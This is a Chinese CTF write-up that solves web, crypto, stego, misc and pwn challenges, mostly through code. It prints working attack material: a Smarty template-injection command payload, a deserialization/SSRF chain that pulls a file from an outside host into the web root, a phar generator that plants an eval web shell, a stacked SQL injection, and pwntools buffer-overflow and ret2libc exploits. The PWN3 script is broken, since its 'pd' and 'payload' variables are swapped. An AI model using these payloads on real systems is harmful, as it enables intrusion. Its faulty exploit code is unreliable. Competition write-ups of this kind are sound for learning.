WEB

GET

smarty模板注入

?name={if passthru ('nl fl*')}{/if}

WEBSITE

8080反序列化+ssrf

payload：

<?php system(“ls /”);system(“ls ../”);system(“cat ../flag_WebSite_SsRf.txt”);

<?php
class copy_file{
    public $path='upload/';
    public $file='1.php';
    public $url='http://127.0.0.1@xxx.xxx.xxx.xxx:xxxx/1.txt';
 
}
$a = new copy_file();
echo serialize($a);

http://example.com@127.0.0.1:8080/?data=O:9:"copy_file":3:{s:4:"path";s:7:"upload/";s:4:"file";s:5:"1.php";s:3:"url";s:41:"http://127.0.0.1@xxx.xxx.xxx.xxx:xxxx/1.txt";}

随后访问

http://127.0.0.1:8080/upload/1.php即可

file manager

一般路过phar伪协议

文件上传测试只能传图片，删除文件unlink可触发phar，同时code.html给了类

生成phar即可

<?php
class game
{
    public $file_name='shell.php';
    public $content = "<?=eval(\$_POST['cmd']);?>";
}

$a = new game();
$phar = new Phar('test.phar',0,'test.phar');
$phar -> startBuffering();
$phar -> setStub("<?php __HALT_COMPILER();?>");
$phar -> setMetadata($a);
$phar -> addFromString("test.txt","test");
$phar -> stopBuffering()

删除文件处删除框填phar://./sandbox/a.png即可触发

StAck3d 1nj3c

老偷题了， [SUCTF 2019]EasySQL，告辞

select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

隐写

在屋子上的小姐姐

好看照片，binwalk提，提示说是八位数字，结合右下角庚子年和June 6,猜测就是

20200606

安卓

android1

hxd直接搜flag

加密码解密

凯撒大帝三步套娃

base64 ， base32 ， hex ，凯撒， md5

依次解密

抚琴的RSA

#coding=utf-8
import gmpy2

p = 28805791771260259486856902729020438686670354441296247148207862836064657849735343618207098163901787287368569768472521344635567334299356760080507454640207003
q = 15991846970993213322072626901560749932686325766403404864023341810735319249066370916090640926219079368845510444031400322229147771682961132420481897362843199
e=354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
n = p*q
c = 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192
phi = (p -1) * (q - 1)
d= int(gmpy2.invert(e,phi))
m=pow(c,d,n)
print(m)

另类RSA

rsatools即可

杂项

Here are three packages！

开局里面给个意义不明的

不知道是啥，直接跑爆破，获得密码：

956931011

获得第二个包，同样意义不明

反复测试得知是字数统计排序，撰写脚本

dic=dict()
d={}
s=set()
s='fk{hbeawfikn .l;jsg[op{ewhtgfkjbarASPUJF923U5 RJO9key3Y2905-RYHWEIOT{YU2390IETGHBF{}FUJse{ikogh{bwieukeyyjvgb"akkeysyh{k;yhweaukyeyoitgbsdakey{jg89gS}OYHqw8{}9ifgbDFHIOGHJ{fbiosGFBJKSgbfuiyoEGJWEbfv}yek'
d=dict()
for x in s:
    if x not in d.keys():
        d[x]=1
    else:
        d[x]=d[x]+1
#print(d)
print(sorted(d.items(), key = lambda i:i[1],reverse=True))

反复测试进行再次排序，次数都为4的不要，即可获得

key{bgfi9JaFHhosw}

解密获得包3

tip3.txt测试为零宽隐写，然还white脑测是snow，

LSP们冲啊

经典crc碰撞

import datetime
import binascii
import string
 
def crack(crc_in):
    crcs = set([crc_in])
    
    r = string.printable
    for a in r:
        for b in r:
            for c in r:
                txt = a+b+c
                crc = binascii.crc32(txt)
                if (crc & 0xFFFFFFFF) in crcs:
                    return txt

print crack(0xd878a99d)
#0x07D3F356,0xd878a99d,0x4E25A843,0x6E16E99D,0x549248B9

获得密码：Zz!9(18Hb9e#>h8

png进行lsb隐写即可

牛气冲天

伪加密cattle.jpg以及zip，

steghide解，脑洞密码就是文件名，

获得密码，awd@$..120LP

解压zip，获得png，

改高度

PWN

PWN1

连接后给提示直接返回地址就行了

from pwn import *

context.log_level = 'debug'
r = remote('127.0.0.1',10000)
payload = 'a'*0x48 + 'b'*4 + p32(0x804856d) + p32(0)
r.send(payload)
r.interactive()

PWN2

开启canary保护

从&BUF读取0x30个数据，也是我们输入的，应该就是写shellcode进行执行，由于未开启pie保护，直接改printf中的值为buf地址即可

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'

p = remote('127.0.0.1', 10001)
elf = ELF('./pwn2')

pd=p64(0x601080)

p.recv()
p.sendline(asm(shellcraft.sh()))

p.recvuntil('hzwz?\n')
p.sendline(str(elf.got['puts']))
p.recvuntil('know: ')
p.sendline(pd)
p.interactive()

PWN3

开启nx保护

程序中存在strtoll函数，首先输入16禁止然还会被在13行再次格式化，这里通过ropper找一下gadgets来构筑rop，最后栈溢出来getshell

ropper –file ./pwn3 –search “pop|ret” | grep rdi

获得地址，撰写exp

exp：

from pwn import *
context.log_level = 'debug'
p=process('./pwn3') 
p=remote("129.226.4.186",10002)
elf=ELF('./pwn3')
libc=elf.libc
#ELF("/lib/x86_64-linux-gnu/libc.so.6 ")

p.recvuntil("plz input something: ")
payload="601018"
p.sendline(pd)

p.recvuntil("something: ")
puts_addr=int(p.recv(15),10)
libc_base = puts_addr -libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base +next(libc.search("/bin/sh"))
p.recvuntil("Show me your code: ")
pd="a"*0x30+p64(0xdeadbeef)+p64(0x400803)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()

文章版权归作者所有，未经允许请勿转载。

THE END